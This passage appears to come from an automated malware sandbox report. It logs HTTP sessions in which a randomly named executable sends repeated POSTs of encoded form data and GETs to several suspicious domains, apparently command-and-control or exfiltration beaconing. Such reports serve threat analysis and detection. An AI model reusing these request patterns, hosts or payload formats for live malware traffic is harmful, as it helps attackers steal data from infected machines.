                                                                                                            Data Raw: 69 78 3d 63 50 78 73 52 64 6f 75 4d 48 36 6f 6c 78 69 42 4c 45 77 52 74 4b 67 76 4b 45 30 41 32 50 32 39 37 70 41 4a 66 39 31 66 55 70 61 4a 65 79 31 47 65 69 45 73 5a 57 36 38 55 33 48 74 78 78 62 42 6d 50 37 2f 76 6b 72 73 74 45 2f 6e 2f 52 6b 63 74 6e 51 65 6e 4d 41 4f 77 42 45 6b 4a 68 48 2b 51 41 55 45 71 31 42 77 65 54 47 63 33 47 76 2f 4c 34 30 68 6a 5a 77 75 43 78 58 63 78 31 72 76 7a 45 43 37 2b 6e 33 30 6b 66 44 6b 4d 2b 55 71 79 68 55 72 4c 62 45 7a 63 39 70 68 78 6d 30 6f 62 59 37 35 67 45 45 6b 33 33 4b 42 6b 37 42 53 55 2f 6c 5a 59 67 63 4d 6c 44 71 38 32 69 43 74 53 54 75 36 53 57 72 59 47 35 71 53 66 5a 57 6f 79 41 3d 3d
                                                                                                            Data Ascii: ix=cPxsRdouMH6olxiBLEwRtKgvKE0A2P297pAJf91fUpaJey1GeiEsZW68U3HtxxbBmP7/vkrstE/n/RkctnQenMAOwBEkJhH+QAUEq1BweTGc3Gv/L40hjZwuCxXcx1rvzEC7+n30kfDkM+UqyhUrLbEzc9phxm0obY75gEEk33KBk7BSU/lZYgcMlDq82iCtSTu6SWrYG5qSfZWoyA==
                                                                                                            Apr 14, 2025 23:19:22.530838013 CEST73INHTTP/1.1 405 Method Not Allowed
                                                                                                            content-length: 0
                                                                                                            connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.74969513.248.169.48806016C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Apr 14, 2025 23:19:25.097642899 CEST760OUTPOST /c6g4/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Host: www.wavekeith.media
                                                                                                            Content-Length: 235
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Origin: http://www.wavekeith.media
                                                                                                            Referer: http://www.wavekeith.media/c6g4/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
                                                                                                            Data Raw: 69 78 3d 63 50 78 73 52 64 6f 75 4d 48 36 6f 6c 52 79 42 48 48 59 52 68 36 67 73 54 6b 30 41 2f 76 32 35 37 75 49 4a 66 38 68 50 55 61 2b 4a 51 77 64 47 66 67 38 73 56 32 36 38 4d 6e 48 73 31 78 62 4b 6d 50 6d 41 76 6d 2f 73 74 45 62 6e 2f 54 73 63 74 51 45 5a 6e 63 41 4d 70 52 45 69 4e 68 48 2b 51 41 55 45 71 31 56 61 65 54 4f 63 33 33 66 2f 4a 5a 30 69 39 70 77 74 46 78 58 63 6d 6c 71 6b 7a 45 43 38 2b 6d 62 65 6b 64 37 6b 4d 37 6f 71 79 30 67 6b 43 62 45 35 43 4e 6f 4d 69 6d 52 7a 53 36 2f 35 6e 45 51 41 75 6b 47 69 73 74 41 77 4f 64 70 31 47 78 6b 33 68 42 4f 4b 68 45 66 59 51 53 71 69 66 30 66 35 5a 4f 50 34 53 4c 33 73 6b 36 72 63 43 57 45 31 41 43 50 66 4c 56 56 34 73 61 4c 66 4b 74 63 3d
                                                                                                            Data Ascii: ix=cPxsRdouMH6olRyBHHYRh6gsTk0A/v257uIJf8hPUa+JQwdGfg8sV268MnHs1xbKmPmAvm/stEbn/TsctQEZncAMpREiNhH+QAUEq1VaeTOc33f/JZ0i9pwtFxXcmlqkzEC8+mbekd7kM7oqy0gkCbE5CNoMimRzS6/5nEQAukGistAwOdp1Gxk3hBOKhEfYQSqif0f5ZOP4SL3sk6rcCWE1ACPfLVV4saLfKtc=
                                                                                                            Apr 14, 2025 23:19:25.217971087 CEST73INHTTP/1.1 405 Method Not Allowed
                                                                                                            content-length: 0
                                                                                                            connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.74969613.248.169.48806016C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Apr 14, 2025 23:19:27.760641098 CEST748OUTPOST /c6g4/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Host: www.wavekeith.media
                                                                                                            Content-Length: 223
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Origin: http://www.wavekeith.media
                                                                                                            Referer: http://www.wavekeith.media/c6g4/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
                                                                                                            Data Raw: 69 78 3d 63 50 78 73 52 64 6f 75 4d 48 36 6f 6c 52 79 42 48 48 59 52 68 36 67 73 54 6b 30 41 2f 76 32 35 37 75 49 4a 66 38 68 50 55 61 32 4a 51 44 6c 47 65 48 51 73 55 32 36 38 53 33 48 58 31 78 62 62 6d 50 2b 45 76 6d 7a 53 74 45 2f 6e 2f 52 6b 63 70 6e 51 5a 74 38 41 4d 77 42 45 2b 63 52 47 75 51 41 4a 78 71 31 42 61 65 54 69 63 33 47 2f 2f 4d 35 30 69 37 5a 77 76 4b 52 58 63 37 56 71 6d 7a 41 65 67 2b 6b 54 6b 6b 65 37 6b 4e 4a 77 71 7a 6e 34 6b 44 37 45 35 44 4e 6f 4b 31 32 73 34 53 36 6e 68 6e 44 4d 39 34 77 71 42 71 62 52 4f 53 38 4e 4a 59 78 6b 4e 67 41 2b 53 76 6c 66 5a 58 79 75 32 53 6d 6d 64 45 35 66 75 57 4c 48 76 6b 4f 2f 55 42 42 30 51 4a 47 53 48
                                                                                                            Data Ascii: ix=cPxsRdouMH6olRyBHHYRh6gsTk0A/v257uIJf8hPUa2JQDlGeHQsU268S3HX1xbbmP+EvmzStE/n/RkcpnQZt8AMwBE+cRGuQAJxq1BaeTic3G//M50i7ZwvKRXc7VqmzAeg+kTkke7kNJwqzn4kD7E5DNoK12s4S6nhnDM94wqBqbROS8NJYxkNgA+SvlfZXyu2SmmdE5fuWLHvkO/UBB0QJGSH
                                                                                                            Apr 14, 2025 23:19:27.882735014 CEST73INHTTP/1.1 405 Method Not Allowed
                                                                                                            content-length: 0
                                                                                                            connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.74969713.248.169.48806016C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Apr 14, 2025 23:19:30.426201105 CEST471OUTGET /c6g4/?NN=3NLhkz&ix=RNZMSqcedGWBg2TZO3dRh8gxMl4f67yslf8Dfsx/arayUyYyOnUvY1yeRgX28wL25sy8+E+PkSfs0QcIoRMa6+Ep4Tg3cATtExcE90VheDKKwlijFeg9xfpzIDqmnkPc+WGA9QqEzPXj HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Host: www.wavekeith.media
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
                                                                                                            Apr 14, 2025 23:19:30.552092075 CEST389INHTTP/1.1 200 OK
                                                                                                            content-type: text/html
                                                                                                            date: Mon, 14 Apr 2025 21:19:30 GMT
                                                                                                            content-length: 268
                                                                                                            connection: close
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4e 4e 3d 33 4e 4c 68 6b 7a 26 69 78 3d 52 4e 5a 4d 53 71 63 65 64 47 57 42 67 32 54 5a 4f 33 64 52 68 38 67 78 4d 6c 34 66 36 37 79 73 6c 66 38 44 66 73 78 2f 61 72 61 79 55 79 59 79 4f 6e 55 76 59 31 79 65 52 67 58 32 38 77 4c 32 35 73 79 38 2b 45 2b 50 6b 53 66 73 30 51 63 49 6f 52 4d 61 36 2b 45 70 34 54 67 33 63 41 54 74 45 78 63 45 39 30 56 68 65 44 4b 4b 77 6c 69 6a 46 65 67 39 78 66 70 7a 49 44 71 6d 6e 6b 50 63 2b 57 47 41 39 51 71 45 7a 50 58 6a 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?NN=3NLhkz&ix=RNZMSqcedGWBg2TZO3dRh8gxMl4f67yslf8Dfsx/arayUyYyOnUvY1yeRgX28wL25sy8+E+PkSfs0QcIoRMa6+Ep4Tg3cATtExcE90VheDKKwlijFeg9xfpzIDqmnkPc+WGA9QqEzPXj"}</script></head></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.749698209.74.80.150806016C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Apr 14, 2025 23:19:35.946878910 CEST728OUTPOST /bpdk/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Host: www.lifway.life
                                                                                                            Content-Length: 215
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Origin: http://www.lifway.life
                                                                                                            Referer: http://www.lifway.life/bpdk/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
                                                                                                            Data Raw: 69 78 3d 64 66 57 67 59 30 74 73 44 35 4f 55 67 35 62 64 4b 32 49 66 79 68 7a 32 33 4e 77 55 32 68 35 63 52 47 69 77 37 57 35 75 39 70 68 78 38 33 53 64 6f 72 50 36 36 71 42 48 41 68 77 4c 4e 53 51 46 7a 5a 53 67 44 32 48 39 4f 66 31 54 65 6f 41 73 69 56 68 41 77 39 41 35 74 39 72 36 2b 53 4f 55 2b 36 74 53 5a 6a 53 4d 7a 2b 6e 73 2f 79 65 76 36 56 4c 50 38 34 4e 58 4f 53 4a 68 4f 5a 74 43 6b 30 59 62 53 73 69 41 72 70 2f 47 47 66 49 78 77 48 4f 36 62 52 4f 35 2f 59 65 66 77 76 7a 6d 69 6f 59 51 49 2f 31 78 42 35 69 33 6f 72 30 2b 78 73 7a 49 70 6c 72 33 33 41 53 72 49 66 48 58 6b 4a 33 4a 4d 30 45 47 54 66 4e 66 6b 67 73 68 62 67 3d 3d
                                                                                                            Data Ascii: ix=dfWgY0tsD5OUg5bdK2Ifyhz23NwU2h5cRGiw7W5u9phx83SdorP66qBHAhwLNSQFzZSgD2H9Of1TeoAsiVhAw9A5t9r6+SOU+6tSZjSMz+ns/yev6VLP84NXOSJhOZtCk0YbSsiArp/GGfIxwHO6bRO5/YefwvzmioYQI/1xB5i3or0+xszIplr33ASrIfHXkJ3JM0EGTfNfkgshbg==
                                                                                                            Apr 14, 2025 23:19:36.119762897 CEST533INHTTP/1.1 404 Not Found
                                                                                                            Date: Mon, 14 Apr 2025 21:19:36 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 389
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.2.749699209.74.80.150806016C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Apr 14, 2025 23:19:38.645226002 CEST748OUTPOST /bpdk/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Host: www.lifway.life
                                                                                                            Content-Length: 235
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Origin: http://www.lifway.life
                                                                                                            Referer: http://www.lifway.life/bpdk/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
                                                                                                            Data Raw: 69 78 3d 64 66 57 67 59 30 74 73 44 35 4f 55 67 5a 72 64 49 57 30 66 6a 42 7a 78 34 74 77 55 39 42 35 51 52 47 6d 77 37 54 42 45 38 66 78 78 2f 58 43 64 70 71 50 36 76 71 42 48 49 42 77 45 53 43 52 4c 7a 5a 57 33 44 7a 6e 39 4f 63 4a 54 65 74 38 73 69 6d 35 44 71 4e 41 37 6b 64 72 34 68 43 4f 55 2b 36 74 53 5a 6a 33 62 7a 2b 2f 73 2f 69 75 76 37 30 4c 4d 2f 34 4d 6c 4a 53 4a 68 66 70 74 47 6b 30 59 6c 53 70 44 62 72 76 37 47 47 64 51 78 77 7a 53 35 42 42 4f 7a 77 34 65 41 39 76 44 74 74 64 4d 41 52 66 4e 7a 46 4a 75 68 67 39 31 63 72 4f 2f 6b 33 30 54 4d 7a 43 32 64 66 35 61 69 6d 49 7a 52 42 57 77 6e 4d 6f 6f 31 70 79 4e 6c 4e 58 61 71 53 45 62 61 58 33 78 41 78 57 4c 53 75 59 72 4f 67 52 45 3d
                                                                                                            Data Ascii: ix=dfWgY0tsD5OUgZrdIW0fjBzx4twU9B5QRGmw7TBE8fxx/XCdpqP6vqBHIBwESCRLzZW3Dzn9OcJTet8sim5DqNA7kdr4hCOU+6tSZj3bz+/s/iuv70LM/4MlJSJhfptGk0YlSpDbrv7GGdQxwzS5BBOzw4eA9vDttdMARfNzFJuhg91crO/k30TMzC2df5aimIzRBWwnMoo1pyNlNXaqSEbaX3xAxWLSuYrOgRE=
                                                                                                            Apr 14, 2025 23:19:38.805211067 CEST533INHTTP/1.1 404 Not Found
                                                                                                            Date: Mon, 14 Apr 2025 21:19:38 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 389
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            8192.168.2.749700209.74.80.150806016C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Apr 14, 2025 23:19:41.340924025 CEST736OUTPOST /bpdk/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Host: www.lifway.life
                                                                                                            Content-Length: 223
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Origin: http://www.lifway.life
                                                                                                            Referer: http://www.lifway.life/bpdk/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
                                                                                                            Data Raw: 69 78 3d 64 66 57 67 59 30 74 73 44 35 4f 55 67 5a 72 64 49 57 30 66 6a 42 7a 78 34 74 77 55 39 42 35 51 52 47 6d 77 37 54 42 45 38 66 35 78 2f 6b 61 64 72 4a 6e 36 39 61 42 48 47 68 77 48 53 43 52 47 7a 64 44 66 44 7a 6a 74 4f 66 31 54 65 6f 41 73 6d 56 68 44 6c 64 41 37 74 39 71 7a 77 79 4f 39 2b 36 68 6f 5a 6a 54 62 7a 2b 54 73 2f 79 4f 76 39 55 4c 4d 33 6f 4e 44 49 53 4a 68 62 70 74 45 6b 30 49 58 53 73 33 4c 72 6f 4c 47 47 75 59 78 68 30 6d 35 44 68 4f 7a 33 34 65 4f 30 50 4f 35 74 64 30 59 52 59 39 6f 4f 2b 43 33 6d 4c 6b 69 33 76 62 59 70 30 54 32 79 44 47 46 52 59 61 6a 68 6f 33 46 4d 45 4a 44 52 66 34 6a 74 79 39 6d 4e 6a 4f 69 52 54 72 2f 65 7a 73 59
                                                                                                            Data Ascii: ix=dfWgY0tsD5OUgZrdIW0fjBzx4twU9B5QRGmw7TBE8f5x/kadrJn69aBHGhwHSCRGzdDfDzjtOf1TeoAsmVhDldA7t9qzwyO9+6hoZjTbz+Ts/yOv9ULM3oNDISJhbptEk0IXSs3LroLGGuYxh0m5DhOz34eO0PO5td0YRY9oO+C3mLki3vbYp0T2yDGFRYajho3FMEJDRf4jty9mNjOiRTr/ezsY
                                                                                                            Apr 14, 2025 23:19:41.501197100 CEST533INHTTP/1.1 404 Not Found
                                                                                                            Date: Mon, 14 Apr 2025 21:19:41 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 389
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            9192.168.2.749701209.74.80.150806016C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Apr 14, 2025 23:19:44.045516014 CEST467OUTGET /bpdk/?ix=Qd+AbDlML76Asp7YEEUMi3jx5MAB0lZePBuu7Alv7PtIyWqe0sOmlfN5AzVKPyVHj8GaIG6tBp5tN59gjWFGxeQciM6shSLelL9WbQzpne3fhS2cyjbY6u5CBjRMOph4h3kRM9WPncft&NN=3NLhkz HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Host: www.lifway.life
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
                                                                                                            Apr 14, 2025 23:19:44.216989040 CEST548INHTTP/1.1 404 Not Found
                                                                                                            Date: Mon, 14 Apr 2025 21:19:44 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 389
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            10192.168.2.74970238.181.35.142806016C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Apr 14, 2025 23:19:50.360629082 CEST728OUTPOST /m2co/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Host: www.zthzzyg.top
                                                                                                            Content-Length: 215
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Origin: http://www.zthzzyg.top
                                                                                                            Referer: http://www.zthzzyg.top/m2co/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
